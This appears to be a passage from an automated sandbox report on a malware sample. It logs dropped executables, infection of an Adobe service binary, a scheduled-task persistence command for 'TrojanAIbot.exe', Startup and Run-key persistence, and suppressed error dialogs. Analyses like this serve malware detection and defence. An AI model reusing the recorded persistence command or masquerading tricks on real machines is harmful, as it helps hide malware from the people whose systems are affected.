Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E52F60 push 02E52FD6h; ret	4_2_02E52FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_01210C6D push edi; retf	13_2_01210C7A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_01210C45 push ebx; retf	13_2_01210C52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_0499632D push eax; ret	16_2_04996341

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E5AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_02E5AB1C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
